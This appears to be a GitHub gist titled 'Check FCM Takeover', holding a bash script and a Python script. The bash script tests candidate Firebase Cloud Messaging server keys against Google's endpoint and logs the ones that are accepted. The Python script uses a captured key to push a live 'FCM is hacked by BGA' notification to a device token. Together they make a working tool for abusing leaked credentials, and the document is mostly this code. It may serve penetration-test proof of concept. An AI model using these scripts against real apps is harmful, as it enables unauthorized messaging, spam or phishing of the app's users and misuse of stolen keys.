@uzeyirdestan
Created October 6, 2020 22:20
Check FCM Takeover
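#!/bin/bash
# Checks whether a string is accepted by FCM as a server key.
RED='\033[0;31m'
NC='\033[0m'
echo "Enter Key:"
read -r key
echo "Testing => $key"
# Send a request with a dummy registration ID and keep only the HTTP status code.
# A 200 response means the Authorization key was accepted.
code=$(curl --header "Authorization: key=$key" --header "Content-Type: application/json" -s -o /dev/null -w "%{http_code}" -d '{"registration_ids":["ABC"]}' 'https://fcm.googleapis.com/fcm/send')
if [ "$code" = "200" ]
then
    echo -e "${RED}[*] $key${NC} Key is vulnerable to FCM take over"
    # Record accepted keys for later review
    echo "$key" >> valid_keys.txt
fi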
#!/usr/bin/python3
# Sends one test notification through FCM using a server key.
# Uses the api_key / notify_single_device interface of pyfcm 1.x.
import argparse

from pyfcm import FCMNotification

# Input management
ap = argparse.ArgumentParser()
ap.add_argument(
    "-sk", "--serverkey", required=True,
    help="FCM Server Key found"
)
ap.add_argument(
    "-iid", "--iid", required=True,
    help="IID Token source from the Client App"
)
args = vars(ap.parse_args())
server_key = args["serverkey"]
iid = args["iid"]

# Authorization
push_service = FCMNotification(api_key=server_key)

# Notification payload
registration_id = iid
message_title = "Oh no :("
message_body = "FCM is hacked by BGA"

# Build the send request and execute it
result = push_service.notify_single_device(
    registration_id=registration_id,
    message_title=message_title,
    message_body=message_body,
    dry_run=False,
)
print(result)